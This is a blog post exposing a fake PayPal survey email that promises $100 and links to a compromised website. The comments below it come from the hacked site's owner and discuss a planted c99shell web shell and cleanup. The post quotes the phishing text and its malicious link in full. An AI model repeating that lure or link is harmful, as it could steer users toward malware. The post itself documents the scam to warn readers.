Posted by Mr Spamalicious | Posted in Computer Virus Spam - Open the Attachment or Follow a Link to Get Infected by a Trojan | Posted on 05-27-2010
This has got to be the laziest attempt to trick me into installing a virus I’ve ever seen. They put the words “PayPal” in quotes and brackets, they make no attempt to even make it look like it’s from PayPal, and they don’t even disguise the link that’s going to try to install the virus. Lazy, lazy, lazy.
From: yzuvqs@accounts.net
Reply To: yzuvqs@accounts.net
To: UserAccountSurvey2010@orange.fr
Dear Customer,
CONGRATULATIONS !!!
You have been chosen by |"_Pay`Pal_"| Online department to take part in our quick
and easy 5 question survey.
In return we will credit $100 to your account - Just for your time!
Helping us better understand how our customers feel benefits everyone.
With the information collected we can decide to direct a number of changes
to improve and expand our online service.
The information you provide us is all non-sensitive and anonymous -
No part of it is handed down to any third party groups.
It will be stored in our secure database for maximum of 3 days while
we process the results of this nationwide survey.
We kindly ask you to spare two minutes of your time in
taking part with this unique offer!
To Continue click on the link below: http://www.gamer-universe.net/update-au/index.php
� Copyright � 1999-2010 |"_Pay`Pal_"|. All rights reserved
ID:
COXCKRMWSNVQVLDBRRXJJQFRXEJBORFJGOZCXS
I’m shocked at what has happened. That is my website that had been hacked. Unfortunetely, I have yet to discover the root of the problem.
Look at the code in the index page. I bet there’s a bunch of code in the header that is designed to execute some malicious process. Delete it and then change your passwords on your FTP and Cpanel accounts.
Glad you’re doing something about it. This website (asasteelstructures.co.uk) was hacked in March and a spammer is using it to deliver malicious payloads. I emailed the company about the problem and it’s now almost June and they still haven’t fixed it. I wrote about it here: http://www.spamdiary.com/2010/03/asa-steel-structures-ltd-looking-for-mules-uh-i-mean-sales-representives/.
What dummies.
I’ve scanned my apache and ftp logs, but I’m unable to locate the reason the files are even being re-created. I’ve deleted the update-au many times already. I’ve also sealed away my up-to-date wordpress blog, yet the attack persists. I might just end up re-doing the whole system. I haven’t even found any vulnerable files yet, sadly.
Holy cow. That really sucks. Clearly the work of one of the more sophisticated hackers. I feel your pain. One good thing is that I haven’t seen a spike in visitors searching for the email in question so hopefully it’s not widespread yet. When a piece of spam is widespread, and I post it, I get a huge spike in traffic from people searching for information. Right now the itunes $50 gift certificate virus scam is off the charts again.
The sneaky bastard made their c99shell file renamed -almost- identical to one of my other files. The strange thing is that there has to be a back-up file somewhere if it had the name it did. It’s not a filename visible to the public. It really sucks when you have a website dedicated to the public, not for profit, and you get hacked.
So I’m curious. How did you discover the hack? Obviously you visited this site at some point. Google indexes my pages instantaneously so whenever I make a new post it immediately ranks for it’s keywords. I assume you discovered it first then went searching and found Spam Diary.
I was given an email from SpamCop that my server was being used as a spambot. I searched my website’s address to see how public it’s become, and I found this site. The spam attack began 7:02AM this morning. I still have yet to find out the origin, so I’m pretty much set on a wipe. This sucks.
Bummer. I assume you have some database backups to reinstall all your posts. If not Google has a lot of your pages cached and you could cut and paste the content and rebuild a lot of the content that way. I had to do it for one of my blogs a while back and it worked perfectly. Good luck.